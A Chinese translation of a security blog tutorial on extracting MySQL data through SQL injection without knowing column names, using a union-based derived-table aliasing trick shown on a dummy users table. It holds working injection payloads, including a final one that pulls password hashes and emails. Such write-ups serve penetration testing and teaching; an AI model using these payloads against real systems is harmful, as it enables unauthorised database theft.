如何在不知道MySQL列名的情况下注入出数据?
介绍
你可能会遇到这样的情况:SQL注入时,需要从MySQL的某个表中导出某些数据。一般来说,要想导出数据,你必须知道表名、列名,而这两个名字在某些情况下可能你并不知道。
例如,对于版本小于5.0的MySQL数据库,以及部分有WAF干扰的版本大于5.0的MySQL数据库,你就无法轻易获得表名、列名。
在这种情况下,也许你会放弃,仅仅注入出数据库名字,证明漏洞存在就结束。
但在这篇文章中,我将展示一种在不知道列名情况下进行的注入。
无列名注入
我和我的队友@aboul3la一起,创建了一个数据库环境来模拟被攻击的目标,并通过大量的尝试最终找到了一个可行方法。
首先展示一下目标表users
MariaDB [dummydb]> select * from users;
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| id | name | password | email | birthdate | added |
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | alias | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org | 1981-05-03 | 1993-03-20 14:03:14 |
| 2 | accusamus | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com | 1979-10-28 | 2007-01-20 18:38:29 |
| 3 | dolor | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com | 2005-11-16 | 1992-02-16 04:19:05 |
| 4 | et | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com | 2015-07-22 | 2014-03-05 22:57:18 |
| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
5 rows in set (0.00 sec)
我们可以看到,这次表的列名有“name”、“password”、“email”、“出birthday”和“added”。
下一步,我们输入一个注入中经常使用的探明列数的查询句式
MariaDB [dummydb]> select 1,2,3,4,5,6 union select * from users;
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2 | 3 | 4 | 5 | 6 |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2 | 3 | 4 | 5 | 6 |
| 1 | alias | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org | 1981-05-03 | 1993-03-20 14:03:14 |
| 2 | accusamus | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com | 1979-10-28 | 2007-01-20 18:38:29 |
| 3 | dolor | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com | 2005-11-16 | 1992-02-16 04:19:05 |
| 4 | et | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com | 2015-07-22 | 2014-03-05 22:57:18 |
| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
6 rows in set (0.00 sec)
很好,我们可以注意到,查询结果中的列的名称从name、password、email、birthdate替换为1、2、3、4、5、6,这主要是因为前面的查询语句select 1,2,3,4,5,6
。
下一步我们就可以根据查询结果中的新的列名提取数据,而针对的数据表就是以上的查询结果。
使用查询语句select
4from (select 1,2,3,4,5,6 union select * from users)redforce;
你就可以将选出第4列数据,也就是电子邮件地址,
MariaDB [dummydb]> select `4` from (select 1,2,3,4,5,6 union select * from users)redforce;
+-----------------------------+
| 4 |
+-----------------------------+
| 4 |
| veronica80@example.org |
| sawayn.amelie@example.com |
| stefan41@example.com |
| zwalsh@example.com |
| pattie.medhurst@example.net |
+-----------------------------+
6 rows in set (0.00 sec)
然后依次select 3,select 2等等。
如果要将其带入实际的注入环境中,我们可以融合产生如下payload-1 union select 1,(select`4`from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -
。你可以通过不停的修改列名1,2,3,4来提取数据。
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `2` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-------+
| author_id | title |
+-----------+-------+
| 1 | alias |
+-----------+-------+
1 row in set (0.00 sec)
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `3` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+------------------------------------------+
| author_id | title |
+-----------+------------------------------------------+
| 1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37 |
+-----------+------------------------------------------+
1 row in set (0.00 sec)
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+------------------------+
| author_id | title |
+-----------+------------------------+
| 1 | veronica80@example.org |
+-----------+------------------------+
1 row in set (0.00 sec)
总而言之
通过这种将未知原列名转换为其他值的方法,你就可以注入出所有的数据。
最终payload
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-----------------------------------------------------------------+
| author_id | title |
+-----------+-----------------------------------------------------------------+
| 1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |
+-----------+-----------------------------------------------------------------+
谢谢阅读这篇文章!
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/
最新评论